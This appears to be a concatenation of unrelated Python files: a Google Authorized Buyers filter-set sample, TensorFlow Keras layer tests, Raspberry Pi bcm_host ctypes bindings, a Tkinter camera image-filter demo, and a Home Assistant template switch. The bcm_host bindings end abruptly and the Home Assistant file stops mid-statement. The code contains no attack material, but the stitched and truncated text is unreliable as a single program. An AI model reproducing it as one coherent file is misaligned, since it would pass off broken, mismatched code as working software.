# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#      http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

"""This example creates a bidder-level filter set.

A bidder-level filter set can be used to retrieve aggregated data for all
Authorized Buyers accounts under the given bidder account, including the bidder
account itself.
"""


import argparse
from datetime import date
from datetime import datetime
from datetime import timedelta
import os
import pprint
import sys
import uuid

sys.path.insert(0, os.path.abspath('..'))

from googleapiclient.errors import HttpError
import samples_util


# strftime/strptime format shared by all date CLI arguments (YYYYMMDD).
_DATE_FORMAT = '%Y%m%d'
# REST resource-name templates for the v2beta1 filter set API paths.
_FILTER_SET_NAME_TEMPLATE = ('bidders/{bidders_resource_id}/'
                             'filterSets/{filtersets_resource_id}')
_OWNER_NAME_TEMPLATE = 'bidders/{bidders_resource_id}'
_TODAY = date.today()
# Closed vocabularies enforced by the argparse type-checkers below.
_VALID_ENVIRONMENTS = ('WEB', 'APP')
_VALID_FORMATS = ('DISPLAY', 'VIDEO')
_VALID_PLATFORMS = ('DESKTOP', 'TABLET', 'MOBILE')
_VALID_TIME_SERIES_GRANULARITIES = ('HOURLY', 'DAILY')

DEFAULT_BIDDER_RESOURCE_ID = 'ENTER_BIDDER_RESOURCE_ID_HERE'
# Random suffix so repeated runs don't collide on the unique resource ID.
DEFAULT_FILTER_SET_RESOURCE_ID = f'FilterSet_{uuid.uuid4()}'
DEFAULT_END_DATE = _TODAY.strftime(_DATE_FORMAT)
# Default reporting window: the seven days ending today.
DEFAULT_START_DATE = (_TODAY - timedelta(days=7)).strftime(
    _DATE_FORMAT)


def main(ad_exchange_buyer, owner_name, body, is_transient):
  """Creates the filter set via the API and prints the response.

  Args:
    ad_exchange_buyer: the discovery-built Ad Exchange Buyer II service.
    owner_name: str, the bidders resource name that will own the filter set.
    body: dict, the FilterSet resource to create.
    is_transient: bool, whether the filter set should be transient.
  """
  try:
    # Construct and execute the request.
    response = ad_exchange_buyer.bidders().filterSets().create(
        ownerName=owner_name, isTransient=is_transient, body=body).execute()
  except HttpError as e:
    print(e)
  else:
    print(f'FilterSet created for bidder: "{owner_name}".')
    pprint.pprint(response)


if __name__ == '__main__':

  # argparse `type=` checkers: each validates one CLI value and either
  # returns it (possibly converted) or raises ArgumentTypeError.

  def time_series_granularity_type(s):
    if s not in _VALID_TIME_SERIES_GRANULARITIES:
      raise argparse.ArgumentTypeError('Invalid TimeSeriesGranularity '
                                       f'specified: "{s}".')
    return s

  def environment_type(s):
    if s not in _VALID_ENVIRONMENTS:
      raise argparse.ArgumentTypeError(
          f'Invalid Environment specified: "{s}".')
    return s

  def format_type(s):
    if s not in _VALID_FORMATS:
      raise argparse.ArgumentTypeError(f'Invalid Format specified: "{s}".')
    return s

  def platform_type(s):
    if s not in _VALID_PLATFORMS:
      raise argparse.ArgumentTypeError(f'Invalid Platform specified: "{s}".')
    return s

  def valid_date(s):
    try:
      return datetime.strptime(s, _DATE_FORMAT).date()
    except ValueError:
      raise argparse.ArgumentTypeError(f'Invalid date specified: "{s}".')

  def valid_bool(s):
    # Fix: the previous `type=bool` made "--is_transient False" parse as
    # True, because bool() of any non-empty string is True. Parse the text
    # explicitly instead. The non-string default (True) bypasses this
    # converter, as argparse only applies `type` to strings.
    if s.lower() in ('true', '1', 'yes'):
      return True
    if s.lower() in ('false', '0', 'no'):
      return False
    raise argparse.ArgumentTypeError(f'Invalid boolean specified: "{s}".')

  parser = argparse.ArgumentParser(
      description=('Creates a bidder-level filter set with the specified '
                   'options.'))
  # Required fields.
  parser.add_argument(
      '-b', '--bidder_resource_id', default=DEFAULT_BIDDER_RESOURCE_ID,
      help=('The resource ID of the bidders resource for which the filter set '
            'is being created. This will be used to construct the ownerName '
            'used as a path parameter for filter set requests. For additional '
            'information on how to configure the ownerName path parameter, '
            'see: https://developers.google.com/authorized-buyers/apis/'
            'reference/rest/v2beta1/bidders.filterSets/create'
            '#body.PATH_PARAMETERS.owner_name'))
  parser.add_argument(
      '-r', '--resource_id', default=DEFAULT_FILTER_SET_RESOURCE_ID,
      help=('The resource ID of the filter set. Note that this must be '
            'unique. This will be used to construct the filter set\'s name. '
            'For additional information on how to configure a filter set\'s '
            'name, see: https://developers.google.com/authorized-buyers/apis/'
            'reference/rest/v2beta1/bidders.filterSets#FilterSet.FIELDS.name'))
  parser.add_argument(
      '--end_date', default=DEFAULT_END_DATE, type=valid_date,
      help=('The end date for the filter set\'s absoluteDateRange field, which '
            'will be accepted in this example in YYYYMMDD format.'))
  parser.add_argument(
      '--start_date', default=DEFAULT_START_DATE, type=valid_date,
      help=('The start date for the filter set\'s time_range field, which '
            'will be accepted in this example in YYYYMMDD format.'))
  # Optional fields.
  parser.add_argument(
      '-e', '--environment', required=False,
      type=environment_type,
      help=('The environment on which to filter.'))
  parser.add_argument(
      '-f', '--format', required=False,
      type=format_type,
      help=('The format on which to filter.'))
  parser.add_argument(
      '-p', '--platforms', required=False, nargs='*', type=platform_type,
      help=('The platforms on which to filter. The filters represented by '
            'multiple platforms are ORed together. Note that you may specify '
            'more than one using a space as a delimiter.'))
  parser.add_argument(
      '-s', '--seller_network_ids', required=False, nargs='*', type=int,
      help=('The list of IDs for seller networks on which to filter. The '
            'filters represented by multiple seller network IDs are ORed '
            'together. Note that you may specify more than one using a space '
            'as a delimiter.'))
  parser.add_argument(
      '-t', '--time_series_granularity', required=False,
      type=time_series_granularity_type,
      help=('The granularity of time intervals if a time series breakdown is '
            'desired.'))
  parser.add_argument(
      '--is_transient', required=False, default=True, type=valid_bool,
      help=('Whether the filter set is transient, or should be persisted '
            'indefinitely. In this example, this will default to True.'))

  args = parser.parse_args()

  # Build the time_range as an AbsoluteDateRange.
  time_range = {
      'startDate': {
          'year': args.start_date.year,
          'month': args.start_date.month,
          'day': args.start_date.day
      },
      'endDate': {
          'year': args.end_date.year,
          'month': args.end_date.month,
          'day': args.end_date.day
      }
  }

  # Create a body containing the required fields.
  BODY = {
      'name': _FILTER_SET_NAME_TEMPLATE.format(
          bidders_resource_id=args.bidder_resource_id,
          filtersets_resource_id=args.resource_id),
      # Note: You may alternatively specify relativeDateRange or
      # realtimeTimeRange.
      'absoluteDateRange': time_range
  }

  # Add optional fields to body if specified.
  if args.environment:
    BODY['environment'] = args.environment
  if args.format:
    BODY['format'] = args.format
  if args.platforms:
    BODY['platforms'] = args.platforms
  if args.seller_network_ids:
    BODY['sellerNetworkIds'] = args.seller_network_ids
  if args.time_series_granularity:
    BODY['timeSeriesGranularity'] = args.time_series_granularity

  try:
    service = samples_util.GetService('v2beta1')
  except IOError as ex:
    print(f'Unable to create adexchangebuyer service - {ex}')
    print('Did you specify the key file in samples_util.py?')
    sys.exit(1)

  main(service, _OWNER_NAME_TEMPLATE.format(
           bidders_resource_id=args.bidder_resource_id),
       BODY, args.is_transient)


# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for Keras core layers."""

from __future__ import absolute_import
from __future__ import division
from __future__ import print_function

import numpy as np

from tensorflow.python import keras
from tensorflow.python.eager import context
from tensorflow.python.framework import ops
from tensorflow.python.keras import keras_parameterized
from tensorflow.python.keras import testing_utils
from tensorflow.python.keras.mixed_precision.experimental import policy
from tensorflow.python.ops import math_ops
from tensorflow.python.platform import test


@keras_parameterized.run_all_keras_modes
class DropoutLayersTest(keras_parameterized.TestCase):
  """Exercises Dropout and SpatialDropout{1,2,3}D in all Keras modes."""

  def test_dropout(self):
    # Plain dropout, then dropout with an explicit broadcastable noise shape.
    for extra in ({}, {'noise_shape': [3, 1]}):
      kwargs = dict({'rate': 0.5}, **extra)
      testing_utils.layer_test(
          keras.layers.Dropout, kwargs=kwargs, input_shape=(3, 2))

  def test_dropout_supports_masking(self):
    layer = keras.layers.Dropout(0.5)
    self.assertTrue(layer.supports_masking)

  def test_spatial_dropout_1d(self):
    testing_utils.layer_test(
        keras.layers.SpatialDropout1D,
        kwargs={'rate': 0.5},
        input_shape=(2, 3, 4))

  def test_spatial_dropout_2d(self):
    # Default (channels_last) and explicit channels_first data formats.
    for fmt in ({}, {'data_format': 'channels_first'}):
      testing_utils.layer_test(
          keras.layers.SpatialDropout2D,
          kwargs=dict({'rate': 0.5}, **fmt),
          input_shape=(2, 3, 4, 5))

  def test_spatial_dropout_3d(self):
    # Default (channels_last) and explicit channels_first data formats.
    for fmt in ({}, {'data_format': 'channels_first'}):
      testing_utils.layer_test(
          keras.layers.SpatialDropout3D,
          kwargs=dict({'rate': 0.5}, **fmt),
          input_shape=(2, 3, 4, 4, 5))


@keras_parameterized.run_all_keras_modes
class LambdaLayerTest(keras_parameterized.TestCase):
  """Tests Lambda layers: calling, output-shape inference, serialization."""

  def test_lambda(self):
    # Simple elementwise function.
    testing_utils.layer_test(
        keras.layers.Lambda,
        kwargs={'function': lambda x: x + 1},
        input_shape=(3, 2))

    # Function taking extra keyword arguments bound via `arguments`.
    testing_utils.layer_test(
        keras.layers.Lambda,
        kwargs={
            'function': lambda x, a, b: x * a + b,
            'arguments': {
                'a': 0.6,
                'b': 0.4
            }
        },
        input_shape=(3, 2))

    # test serialization with a named function (round-trip via deserialize)
    def f(x):
      return x + 1

    ld = keras.layers.Lambda(f)
    config = ld.get_config()
    ld = keras.layers.deserialize({
        'class_name': 'Lambda',
        'config': config
    })

    # test serialization with an anonymous lambda (round-trip via from_config)
    ld = keras.layers.Lambda(
        lambda x: keras.backend.concatenate([math_ops.square(x), x]))
    config = ld.get_config()
    ld = keras.layers.Lambda.from_config(config)

  def test_lambda_multiple_inputs(self):
    # A list input: the function and output_shape both pick the first element.
    ld = keras.layers.Lambda(lambda x: x[0], output_shape=lambda x: x[0])
    x1 = np.ones([3, 2], np.float32)
    x2 = np.ones([3, 5], np.float32)
    out = ld([x1, x2])
    self.assertAllEqual(out.shape, [3, 2])

  def test_lambda_output_shape(self):
    # A tuple output_shape is recorded verbatim in the config.
    l = keras.layers.Lambda(lambda x: x + 1, output_shape=(1, 1))
    l(keras.backend.variable(np.ones((1, 1))))
    self.assertEqual((1, 1), l.get_config()['output_shape'])

  def test_lambda_output_shape_function(self):
    # A callable output_shape is serialized with type tag 'lambda'.
    def get_output_shape(input_shape):
      return 1 * input_shape

    l = keras.layers.Lambda(lambda x: x + 1, output_shape=get_output_shape)
    l(keras.backend.variable(np.ones((1, 1))))
    self.assertEqual('lambda', l.get_config()['output_shape_type'])

  def test_lambda_output_shape_autocalculate_multiple_inputs(self):
    # With no output_shape given, the shape is inferred from the function.

    def lambda_fn(x):
      return math_ops.matmul(x[0], x[1])

    l = keras.layers.Lambda(lambda_fn)
    output_shape = l.compute_output_shape([(10, 10), (10, 20)])
    self.assertAllEqual((10, 20), output_shape)

  def test_lambda_output_shape_list_multiple_outputs(self):
    # output_shape given as a list of per-output shapes (batch dim prepended).

    def lambda_fn(x):
      return x

    l = keras.layers.Lambda(lambda_fn, output_shape=[(10,), (20,)])
    output_shape = l.compute_output_shape([(10, 10), (10, 20)])
    self.assertAllEqual([(10, 10), (10, 20)], output_shape)

  def test_lambda_output_shape_tuple_with_none(self):
    # None entries in output_shape are preserved as unknown dimensions.

    def lambda_fn(x):
      return x

    l = keras.layers.Lambda(lambda_fn, output_shape=(None, 10))
    output_shape = l.compute_output_shape((5, 10, 20))
    self.assertAllEqual([5, None, 10], output_shape.as_list())

  def test_lambda_output_shape_function_multiple_outputs(self):
    # A callable output_shape handles multi-input/multi-output cases.

    def lambda_fn(x):
      return x

    def output_shape_fn(input_shape):
      return input_shape

    l = keras.layers.Lambda(lambda_fn, output_shape=output_shape_fn)
    output_shape = l.compute_output_shape([(10, 10), (10, 20)])
    self.assertAllEqual([(10, 10), (10, 20)], output_shape)

  def test_lambda_config_serialization(self):
    # Test serialization with output_shape and output_shape_type
    layer = keras.layers.Lambda(lambda x: x + 1, output_shape=(1, 1))
    layer(keras.backend.variable(np.ones((1, 1))))
    config = layer.get_config()
    layer = keras.layers.deserialize({
        'class_name': 'Lambda',
        'config': config
    })
    layer = keras.layers.Lambda.from_config(config)


@keras_parameterized.run_all_keras_modes
class CoreLayersTest(keras_parameterized.TestCase):
  """Tests for Masking, Activation, Reshape, Permute, Flatten, RepeatVector,
  Dense and ActivityRegularization layers."""

  def test_masking(self):
    testing_utils.layer_test(
        keras.layers.Masking, kwargs={}, input_shape=(3, 2, 3))

  def test_keras_mask(self):
    # Masking with mask_value=1. on an all-ones input masks every timestep,
    # so the attached mask evaluates to all zeros.
    x = np.ones((10, 10))
    y = keras.layers.Masking(1.)(x)
    self.assertTrue(hasattr(y, '_keras_mask'))
    self.assertTrue(y._keras_mask is not None)
    self.assertAllClose(self.evaluate(y._keras_mask), np.zeros((10,)))

  def test_activation(self):
    # with string argument
    testing_utils.layer_test(
        keras.layers.Activation,
        kwargs={'activation': 'relu'},
        input_shape=(3, 2))

    # with function argument
    testing_utils.layer_test(
        keras.layers.Activation,
        kwargs={'activation': keras.backend.relu},
        input_shape=(3, 2))

  def test_reshape(self):
    testing_utils.layer_test(
        keras.layers.Reshape,
        kwargs={'target_shape': (8, 1)},
        input_shape=(3, 2, 4))

    # -1 infers the corresponding dimension from the input size.
    testing_utils.layer_test(
        keras.layers.Reshape,
        kwargs={'target_shape': (-1, 1)},
        input_shape=(3, 2, 4))

    testing_utils.layer_test(
        keras.layers.Reshape,
        kwargs={'target_shape': (1, -1)},
        input_shape=(3, 2, 4))

    # Unknown (None) input dimensions must also be supported.
    testing_utils.layer_test(
        keras.layers.Reshape,
        kwargs={'target_shape': (-1, 1)},
        input_shape=(None, None, 2))

  def test_permute(self):
    testing_utils.layer_test(
        keras.layers.Permute, kwargs={'dims': (2, 1)}, input_shape=(3, 2, 4))

  def test_permute_errors_on_invalid_starting_dims_index(self):
    # dims are 1-indexed; including 0 must be rejected.
    with self.assertRaisesRegexp(ValueError, r'Invalid permutation .*dims.*'):
      testing_utils.layer_test(
          keras.layers.Permute,
          kwargs={'dims': (0, 1, 2)}, input_shape=(3, 2, 4))

  def test_permute_errors_on_invalid_set_of_dims_indices(self):
    # dims must be a permutation of 1..rank-1; a gap (4 without 3) is invalid.
    with self.assertRaisesRegexp(ValueError, r'Invalid permutation .*dims.*'):
      testing_utils.layer_test(
          keras.layers.Permute,
          kwargs={'dims': (1, 4, 2)}, input_shape=(3, 2, 4))

  def test_flatten(self):
    testing_utils.layer_test(
        keras.layers.Flatten, kwargs={}, input_shape=(3, 2, 4))

    # Test channels_first: flattening transposes to channels_last order first.
    inputs = np.random.random((10, 3, 5, 5)).astype('float32')
    outputs = testing_utils.layer_test(
        keras.layers.Flatten,
        kwargs={'data_format': 'channels_first'},
        input_data=inputs)
    target_outputs = np.reshape(
        np.transpose(inputs, (0, 2, 3, 1)), (-1, 5 * 5 * 3))
    self.assertAllClose(outputs, target_outputs)

  def test_flatten_scalar_channels(self):
    # Rank-1 input (batch only): Flatten adds a trailing dim of size 1.
    testing_utils.layer_test(
        keras.layers.Flatten, kwargs={}, input_shape=(3,))

    # Test channels_first
    inputs = np.random.random((10,)).astype('float32')
    outputs = testing_utils.layer_test(
        keras.layers.Flatten,
        kwargs={'data_format': 'channels_first'},
        input_data=inputs)
    target_outputs = np.expand_dims(inputs, -1)
    self.assertAllClose(outputs, target_outputs)

  def test_repeat_vector(self):
    testing_utils.layer_test(
        keras.layers.RepeatVector, kwargs={'n': 3}, input_shape=(3, 2))

  def test_dense(self):
    # Dense must support inputs of rank 2, 3 and 4, including unknown dims.
    testing_utils.layer_test(
        keras.layers.Dense, kwargs={'units': 3}, input_shape=(3, 2))

    testing_utils.layer_test(
        keras.layers.Dense, kwargs={'units': 3}, input_shape=(3, 4, 2))

    testing_utils.layer_test(
        keras.layers.Dense, kwargs={'units': 3}, input_shape=(None, None, 2))

    testing_utils.layer_test(
        keras.layers.Dense, kwargs={'units': 3}, input_shape=(3, 4, 5, 2))

  def test_dense_dtype(self):
    # Integer inputs are cast to the layer's float dtype.
    inputs = ops.convert_to_tensor(
        np.random.randint(low=0, high=7, size=(2, 2)))
    layer = keras.layers.Dense(5, dtype='float32')
    outputs = layer(inputs)
    self.assertEqual(outputs.dtype, 'float32')

  def test_dense_with_policy(self):
    # infer_float32_vars: variables are float32 while compute stays float16.
    inputs = ops.convert_to_tensor(
        np.random.randint(low=0, high=7, size=(2, 2)), dtype='float16')
    layer = keras.layers.Dense(5, dtype=policy.Policy('infer_float32_vars'))
    outputs = layer(inputs)
    self.assertEqual(outputs.dtype, 'float16')
    self.assertEqual(layer.kernel.dtype, 'float32')

  def test_dense_regularization(self):
    # kernel + bias + activity regularizers -> three loss tensors.
    layer = keras.layers.Dense(
        3,
        kernel_regularizer=keras.regularizers.l1(0.01),
        bias_regularizer='l1',
        activity_regularizer='l2',
        name='dense_reg')
    layer(keras.backend.variable(np.ones((2, 4))))
    self.assertEqual(3, len(layer.losses))

  def test_dense_constraints(self):
    k_constraint = keras.constraints.max_norm(0.01)
    b_constraint = keras.constraints.max_norm(0.01)
    layer = keras.layers.Dense(
        3, kernel_constraint=k_constraint, bias_constraint=b_constraint)
    layer(keras.backend.variable(np.ones((2, 4))))
    self.assertEqual(layer.kernel.constraint, k_constraint)
    self.assertEqual(layer.bias.constraint, b_constraint)

  def test_activity_regularization(self):
    layer = keras.layers.ActivityRegularization(l1=0.1)
    layer(keras.backend.variable(np.ones((2, 4))))
    self.assertEqual(1, len(layer.losses))
    config = layer.get_config()
    self.assertEqual(config.pop('l1'), 0.1)

  def test_numpy_inputs(self):
    # Layers must accept raw numpy arrays directly in eager mode.
    if context.executing_eagerly():
      layer = keras.layers.RepeatVector(2)
      x = np.ones((10, 10))
      self.assertAllEqual(np.ones((10, 2, 10)), layer(x))

      layer = keras.layers.Concatenate()
      x, y = np.ones((10, 10)), np.ones((10, 10))
      self.assertAllEqual(np.ones((10, 20)), layer([x, y]))


# Standard TensorFlow test entry point: discovers and runs the cases above.
if __name__ == '__main__':
  test.main()

# vim: set et sw=4 sts=4 fileencoding=utf-8:
#
# Python header conversion
# Copyright (c) 2013,2014 Dave Hughes <dave@waveform.org.uk>
#
# Original headers
# Copyright (c) 2012, Broadcom Europe Ltd
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
#     * Redistributions of source code must retain the above copyright
#       notice, this list of conditions and the following disclaimer.
#     * Redistributions in binary form must reproduce the above copyright
#       notice, this list of conditions and the following disclaimer in the
#       documentation and/or other materials provided with the distribution.
#     * Neither the name of the copyright holder nor the
#       names of its contributors may be used to endorse or promote products
#       derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.

from __future__ import (
    unicode_literals,
    print_function,
    division,
    absolute_import,
    )

# Make Py2's str equivalent to Py3's
str = type('')

import ctypes as ct
import warnings

# Load the Broadcom VideoCore host library (present on Raspberry Pi OS images).
_lib = ct.CDLL('libbcm_host.so')

# bcm_host.h #################################################################
# ctypes prototypes mirroring the C declarations in bcm_host.h.

# void bcm_host_init(void)
bcm_host_init = _lib.bcm_host_init
bcm_host_init.argtypes = []
bcm_host_init.restype = None

# void bcm_host_deinit(void)
bcm_host_deinit = _lib.bcm_host_deinit
bcm_host_deinit.argtypes = []
bcm_host_deinit.restype = None

# int32_t graphics_get_display_size(uint16_t display_number,
#                                   uint32_t *width, uint32_t *height)
graphics_get_display_size = _lib.graphics_get_display_size
graphics_get_display_size.argtypes = [ct.c_uint16, ct.POINTER(ct.c_uint32), ct.POINTER(ct.c_uint32)]
graphics_get_display_size.restype = ct.c_int32


# quick demo of some python image filters
# using raspberry pi camera

import Tkinter as tk
from picamera import PiCamera
from time import sleep
from PIL import Image,ImageFilter,ImageChops,ImageTk

imagefile = "image.jpg"  # scratch file each capture is written to / read from
w = 320  # initial window size; replaced below by the captured image's size
h = 240
lastfilter = "none"  # last filter applied; "none" sentinel means no filter yet
camera = PiCamera()

def takephoto():
    """Capture a frame from the camera to disk and return it as a PIL image."""
    camera.capture(imagefile)
    return Image.open(imagefile)

def photoloop():
    """Capture 9 frames, half a second apart, re-applying the last filter.

    Fixes three defects in the previous version: the filter check used
    string identity (`is not "none"`) instead of equality; `dofilter` was
    called with its (image, filter) arguments swapped; and the return value
    of `newphoto()` (which updates the global `image1` as a side effect) was
    being captured instead of reading the global.
    """
    for _ in range(9):
        sleep(0.5)
        newphoto()  # refreshes the module-global `image1` and the Tk panel
        if lastfilter != "none":
            dofilter(image1, lastfilter)

def newphoto():
   """Take a fresh photo, show it in the panel, and return it.

   Rebinds the module-global ``image1`` to the new capture. Previously this
   returned None even though callers assigned its result; it now returns the
   new image (backward-compatible: old callers simply ignored None).
   """
   global image1
   image1 = takephoto()

   tkimage1 = ImageTk.PhotoImage(image1)
   panel1.configure(image=tkimage1)
   # Keep a reference on the widget so Tk's image isn't garbage-collected.
   panel1.image = tkimage1
   return image1

def invert():
   """Replace the displayed image with its color negative."""
   global image1
   image1 = ImageChops.invert(image1)

   shown = ImageTk.PhotoImage(image1)
   panel1.configure(image=shown)
   # Keep a reference on the widget so Tk's image isn't garbage-collected.
   panel1.image = shown

def grayscale():
   """Fake a grayscale look by copying the green channel into R, G and B."""
   global image1
   green = image1.split()[1]  # channel order is (R, G, B); take G
   image1 = Image.merge("RGB", (green, green, green))

   shown = ImageTk.PhotoImage(image1)
   panel1.configure(image=shown)
   # Keep a reference on the widget so Tk's image isn't garbage-collected.
   panel1.image = shown

def dofilter(theimage, thefilter):
   """Apply `thefilter` to the global image and remember it for the loop.

   `theimage` is kept for the button callbacks' calling convention, but the
   filter is always applied to the module-global `image1` (as before).
   """
   global lastfilter, image1
   # Previously `lastfilter = thefilter` was a dead store into a local;
   # it must update the module global so photoloop can re-apply it.
   lastfilter = thefilter
   image1 = image1.filter(thefilter)
   tkimage1 = ImageTk.PhotoImage(image1)
   panel1.configure(image=tkimage1)
   # Keep a reference on the widget so Tk's image isn't garbage-collected.
   panel1.image = tkimage1

# Setup a window
root = tk.Tk()
root.title('Image')

# Take an initial photo and size the window to match it.
image1 = takephoto()
tkimage1 = ImageTk.PhotoImage(image1)

w = tkimage1.width()
h = tkimage1.height()
root.geometry("%dx%d+%d+%d" % (w, h, 0, 0))

# root has no image argument, so use a label as a panel
panel1 = tk.Label(root, image=tkimage1)
panel1.pack(side='top', fill='both', expand='yes')

# save the panel's image from 'garbage collection'
panel1.image = tkimage1

# Add some buttons
buttonrow = tk.Frame(root)
buttonrow.place(y=0,x=0)

button = tk.Button(buttonrow, text='CAMERA',command = lambda: newphoto())
button.pack(side='left',)
button = tk.Button(buttonrow, text='LOOP',command = lambda: photoloop())
button.pack(side='left',)
button = tk.Button(buttonrow, text='INVERT',command = lambda: invert())
button.pack(side='left',)
button = tk.Button(buttonrow, text='GRAY',command = lambda: grayscale())
button.pack(side='left',)

# add some filter buttons; each applies a PIL.ImageFilter to the current image
button = tk.Button(buttonrow, text='BLUR',command = lambda: dofilter(image1,ImageFilter.BLUR))
button.pack(side='left')
button = tk.Button(buttonrow, text='CONTOUR',command = lambda: dofilter(image1,ImageFilter.CONTOUR))
button.pack(side='left')
button = tk.Button(buttonrow, text='FIND_EDGES',command = lambda: dofilter(image1,ImageFilter.FIND_EDGES))
button.pack(side='left')
button = tk.Button(buttonrow, text='EMBOSS',command = lambda: dofilter(image1,ImageFilter.EMBOSS))
button.pack(side='left')
button = tk.Button(buttonrow, text='EDGE_ENHANCE',command = lambda: dofilter(image1,ImageFilter.EDGE_ENHANCE))
button.pack(side='left')
button = tk.Button(buttonrow, text='CLOSE',command = lambda: root.destroy())
button.pack(side='left')

# Enter the Tk event loop; blocks until the window is closed.
root.mainloop()
"""Support for switches which integrates with other components."""
import logging

import voluptuous as vol

from homeassistant.components.switch import (
    ENTITY_ID_FORMAT,
    PLATFORM_SCHEMA,
    SwitchEntity,
)
from homeassistant.const import (
    ATTR_ENTITY_ID,
    ATTR_FRIENDLY_NAME,
    CONF_ENTITY_PICTURE_TEMPLATE,
    CONF_ICON_TEMPLATE,
    CONF_SWITCHES,
    CONF_UNIQUE_ID,
    CONF_VALUE_TEMPLATE,
    STATE_OFF,
    STATE_ON,
)
from homeassistant.core import callback
from homeassistant.exceptions import TemplateError
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.entity import async_generate_entity_id
from homeassistant.helpers.reload import async_setup_reload_service
from homeassistant.helpers.restore_state import RestoreEntity
from homeassistant.helpers.script import Script

from .const import CONF_AVAILABILITY_TEMPLATE, DOMAIN, PLATFORMS
from .template_entity import TemplateEntity

_LOGGER = logging.getLogger(__name__)
# Template render results accepted as a switch state (compared lowercased).
_VALID_STATES = [STATE_ON, STATE_OFF, "true", "false"]

# Configuration keys for the scripts executed when turning on/off.
ON_ACTION = "turn_on"
OFF_ACTION = "turn_off"

# Schema for one template switch entry: optional display/availability
# templates plus the two required action scripts.
SWITCH_SCHEMA = vol.Schema(
    {
        vol.Optional(CONF_VALUE_TEMPLATE): cv.template,
        vol.Optional(CONF_ICON_TEMPLATE): cv.template,
        vol.Optional(CONF_ENTITY_PICTURE_TEMPLATE): cv.template,
        vol.Optional(CONF_AVAILABILITY_TEMPLATE): cv.template,
        vol.Required(ON_ACTION): cv.SCRIPT_SCHEMA,
        vol.Required(OFF_ACTION): cv.SCRIPT_SCHEMA,
        vol.Optional(ATTR_FRIENDLY_NAME): cv.string,
        vol.Optional(ATTR_ENTITY_ID): cv.entity_ids,
        vol.Optional(CONF_UNIQUE_ID): cv.string,
    }
)

# Platform schema: mapping of entity slug -> switch configuration.
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
    {vol.Required(CONF_SWITCHES): cv.schema_with_slug_keys(SWITCH_SCHEMA)}
)


async def _async_create_entities(hass, config):
    """Build one SwitchTemplate entity per configured switch entry."""
    entities = []

    for object_id, cfg in config[CONF_SWITCHES].items():
        entities.append(
            SwitchTemplate(
                hass,
                object_id,
                # Fall back to the slug when no friendly name is configured.
                cfg.get(ATTR_FRIENDLY_NAME, object_id),
                cfg.get(CONF_VALUE_TEMPLATE),
                cfg.get(CONF_ICON_TEMPLATE),
                cfg.get(CONF_ENTITY_PICTURE_TEMPLATE),
                cfg.get(CONF_AVAILABILITY_TEMPLATE),
                cfg[ON_ACTION],
                cfg[OFF_ACTION],
                cfg.get(CONF_UNIQUE_ID),
            )
        )

    return entities


async def async_setup_platform(hass, config, async_add_entities, discovery_info=None):
    """Set up the template switches.

    Registers the integration's reload service, then adds one entity per
    configured switch.
    """

    await async_setup_reload_service(hass, DOMAIN, PLATFORMS)
    async_add_entities(await _async_create_entities(hass, config))


class SwitchTemplate(TemplateEntity, SwitchEntity, RestoreEntity):
    """Representation of a Template switch.

    State is driven by an optional value template; when no template is
    configured the switch is "assumed state" and is toggled optimistically
    by its on/off action scripts, restoring its last state on startup.
    """

    def __init__(
        self,
        hass,
        device_id,
        friendly_name,
        state_template,
        icon_template,
        entity_picture_template,
        availability_template,
        on_action,
        off_action,
        unique_id,
    ):
        """Initialize the Template switch.

        Arguments mirror SWITCH_SCHEMA: optional display/availability
        templates, the required on/off action scripts, and an optional
        unique id.
        """
        super().__init__(
            availability_template=availability_template,
            icon_template=icon_template,
            entity_picture_template=entity_picture_template,
        )
        self.entity_id = async_generate_entity_id(
            ENTITY_ID_FORMAT, device_id, hass=hass
        )
        self._name = friendly_name
        self._template = state_template
        # Derive the integration domain from this module's package, e.g.
        # "homeassistant.components.template.switch" -> "template".
        domain = __name__.split(".")[-2]
        self._on_script = Script(hass, on_action, friendly_name, domain)
        self._off_script = Script(hass, off_action, friendly_name, domain)
        self._state = False
        self._unique_id = unique_id

    @callback
    def _update_state(self, result):
        """Handle a new render of the state template."""
        super()._update_state(result)
        if isinstance(result, TemplateError):
            # Template failed to render: state is unknown.
            self._state = None
            return
        # Any rendered value other than "true"/"on" is treated as off.
        # NOTE(review): assumes `result` is a string here — confirm upstream.
        self._state = result.lower() in ("true", STATE_ON)

    async def async_added_to_hass(self):
        """Register callbacks."""

        if self._template is None:

            # restore state after startup
            await super().async_added_to_hass()
            state = await self.async_get_last_state()
            if state:
